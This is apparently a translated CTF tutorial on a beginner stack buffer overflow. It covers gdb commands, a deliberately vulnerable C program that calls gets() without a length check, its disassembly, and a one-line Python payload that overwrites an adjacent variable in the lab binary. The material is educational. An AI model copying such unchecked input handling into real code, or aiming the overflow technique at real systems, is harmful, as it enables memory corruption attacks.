CTF: notes on a PWN exercise

PWN is hacker slang derived from the word "own". It comes from online gaming culture, where it is used to mock an opponent who has been completely defeated in a match (for example: "You just got pwned!"). The well-known international contest Pwn2Own takes its name from this idea: defeat the target, and you own it.

In a CTF, a PWN challenge usually hands out a compiled binary (an EXE under Windows, an ELF file under Linux, and so on). Contestants reverse-engineer and debug the binary to find an exploitable vulnerability, write exploit code, turn the overflow into code execution on the remote target, and finally obtain a shell on the target machine to capture the flag.

Time to introduce tools again. First, gdb.

gdb is a commonly used command-line debugger under Linux, which has very powerful debugging functions. The gdb commands needed in this experiment are as follows:

- `disas main`: disassemble the function `main`
- `b *ADDR`: set a breakpoint at the instruction at address ADDR
- `r`: run the program being debugged
- `x ADDR`: examine memory at ADDR
- `ni`: execute one instruction, stepping over calls
- `c`: continue execution until the next breakpoint or exit
- `q`: quit gdb

In PWN work, gdb plays a role comparable to that of IDA in reverse engineering.

Besides tools, you also need some basic assembly knowledge. Understanding common assembly instructions is a basic requirement for solving PWN challenges in CTF competitions. The instructions needed for this experiment are those that appear in the disassembly of `main` below:

- `push` / `pop`: push a value onto the stack / pop a value off it
- `mov`: copy a value between registers or between a register and memory
- `and`: bitwise AND (used here to align esp)
- `sub`: subtract (used here to reserve stack space)
- `lea`: load the address of a memory operand into a register
- `call` / `ret`: call a function / return from one
- `cmp`: compare two operands and set the flags
- `je` / `jmp`: jump if the compared operands were equal / jump unconditionally
- `leave`: restore the caller's frame (`mov %ebp,%esp; pop %ebp`)

In assembly, the esp register points to the top of the current function's stack frame. The function's local variables live in stack space, and the stack grows downward, that is, from high addresses to low addresses.

A buffer overflow occurs when a program writes more data into a buffer than the buffer can hold, so the excess data overwrites the legitimate data that follows it. Ideally the program checks the length of the data and refuses input longer than the buffer, but many programs assume the data will always fit the allocated storage, and that assumption is what makes buffer overflows possible.

This article is accompanied by a hands-on exercise: ["CTF PWN Practice"](https://www.hetianlab.com/expc.do?ec=ECID172.19.104.182014103116591300001&pk_campaign=freebuf-wemedia). PWN is one of the main challenge types in CTF competitions; it mainly tests contestants' reverse analysis, vulnerability discovery and exploit-writing skills. The CTF-PWN series of experiments takes the most common case, the stack overflow, as its main line, explaining the principle and practice of stack overflow attacks step by step from the basics to more advanced material, and also covers the basic usage of the GDB debugger under Linux in detail.

First read the challenge description; it matters as much as reading the source of a web challenge. There is a program `pwn1` in the directory `/home/test/1` on the host. When run, it accepts input for testing and prints the message `Please try again.` Perform reverse analysis and debugging on `pwn1`, find the vulnerability inside the program, and construct input data that makes it print `Congratulations, you pwned it.`

The first step is a source code audit. In real CTF competitions the source of a PWN binary is generally not provided; to make learning easier, the C source of this binary is given here, so we can locate the vulnerability by auditing the source, which makes the later analysis at the assembly level much easier.

(Without source code, we usually reverse-engineer the binary with IDA Pro. IDA's Hex-Rays plugin can decompile the disassembly into C-like pseudocode that is nearly as readable as source. The use of IDA is explained in the later experiments.)

Run `cd /home/test/1` to switch to the directory containing the program, then `cat pwn1.c` to view the source:

```c
#include <stdio.h>

int main(int argc, char **argv)
{
    int modified;
    char buffer[64];

    modified = 0;
    gets(buffer); /* no length check: this is what triggers the buffer overflow */
    if (modified != 0) {
        printf("Congratulations, you pwned it.\n");
    } else {
        printf("Please try again.\n");
    }
    return 0;
}
```


Notice that `gets` reads the input without checking the length of `buffer`, so input longer than the buffer causes a buffer overflow.

With the vulnerability found, let's look at how to exploit it. Run `gdb pwn1` to start debugging `pwn1` under gdb. We now need to read the assembly of `main`; in gdb, run `disas main`:

![图片3.png](https://img-blog.csdnimg.cn/img_convert/1464da519212f5d1df248cf6cfc9d1e2.jpeg)

The assembly of `main` is explained below (comments precede the instruction they describe):

```asm
0x080482a0 <+0>:  push   %ebp
0x080482a1 <+1>:  mov    %esp,%ebp
0x080482a3 <+3>:  and    $0xfffffff0,%esp
; esp = esp - 0x60: reserve 0x60 bytes on the stack
0x080482a6 <+6>:  sub    $0x60,%esp
; modified lives at esp + 0x5C; initialize it to 0
0x080482a9 <+9>:  movl   $0x0,0x5c(%esp)
; buffer lives at esp + 0x1C
0x080482b1 <+17>: lea    0x1c(%esp),%eax
0x080482b5 <+21>: mov    %eax,(%esp)
; call gets(buffer) to read the input
0x080482b8 <+24>: call   0x8049360 <gets>
; test whether modified is 0
0x080482bd <+29>: cmpl   $0x0,0x5c(%esp)
; if modified == 0, jump to 0x080482d2
0x080482c2 <+34>: je     0x80482d2 <main+50>
; modified != 0: print the success message
0x080482c4 <+36>: movl   $0x80b3eec,(%esp)
0x080482cb <+43>: call   0x8049500 <puts>
0x080482d0 <+48>: jmp    0x80482de <main+62>
; modified == 0: print the failure message
0x080482d2 <+50>: movl   $0x80b3f0b,(%esp)
0x080482d9 <+57>: call   0x8049500 <puts>
0x080482de <+62>: mov    $0x0,%eax
0x080482e3 <+67>: leave
0x080482e4 <+68>: ret
```

From the assembly we know that `buffer` is at esp+0x1C and `modified` at esp+0x5C. The distance between the two is 0x5C - 0x1C = 0x40, i.e. 64 bytes, exactly the size of the `buffer` array. So once our input exceeds 64 bytes, `modified` gets overwritten. Note that `gets` also appends a terminating NUL after the input: with exactly 64 bytes that NUL lands in the low byte of `modified`, which is already 0, so the first byte that visibly changes `modified` is the 65th.

Now let's verify this in gdb. Run `b *0x080482bd` to set a breakpoint on the instruction right after the call to `gets` (the `*` tells gdb the argument is an address rather than a line number):

![图片4.png](https://img-blog.csdnimg.cn/img_convert/5c2e416ee24ad101ad43f4b8a5d667ab.jpeg)

Run `r` in gdb to start the debugged `pwn1` process; it now waits for input. Enter 64 A's followed by one B (i.e. `AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB`) and press Enter; the program stops at the breakpoint:

![图片5.png](https://img-blog.csdnimg.cn/img_convert/50de82877931ab5c62e8c5ada2307ef9.jpeg)

Enter `x $esp+0x5C` in gdb to inspect `modified`: its value has become 0x00000042, and 0x42 is the ASCII code of `B`, which shows that the 65th byte of our input successfully overwrote `modified`:

![image](https://img-blog.csdnimg.cn/img_convert/fe9d5f89bf1d99015e1301d0a409eb0e.jpeg)

Run `ni` twice in gdb. You can see that the `je` instruction does not jump, meaning `modified` is non-zero and the program enters the `if` branch that prints the success message:

![图片7.png](https://img-blog.csdnimg.cn/img_convert/b40d70bdafeba39f4316d3cff0f7cfae.jpeg)

Enter `c` in gdb to let the program continue, and the success message is printed:

![图片8.png](https://img-blog.csdnimg.cn/img_convert/72d8bdadfbf70233878f65946014bab5.jpeg)

Through the steps above we now know how to control the input data to reach the `if` branch. Next we construct the input and carry out the attack.

If you have not left gdb yet, enter `q` to quit. Now construct the input with a Python one-liner and pipe it into `pwn1` (Python 2 syntax, as used in the exercise environment):

```shell
python -c "print 'A'*64+'B'" | ./pwn1
```

![图片9.png](https://img-blog.csdnimg.cn/img_convert/613f81ca7a57643e4871768cc591d9a9.jpeg)

The overflow attack has succeeded: the program has been pwned!



Source: blog.csdn.net/qq_53225741/article/details/132219869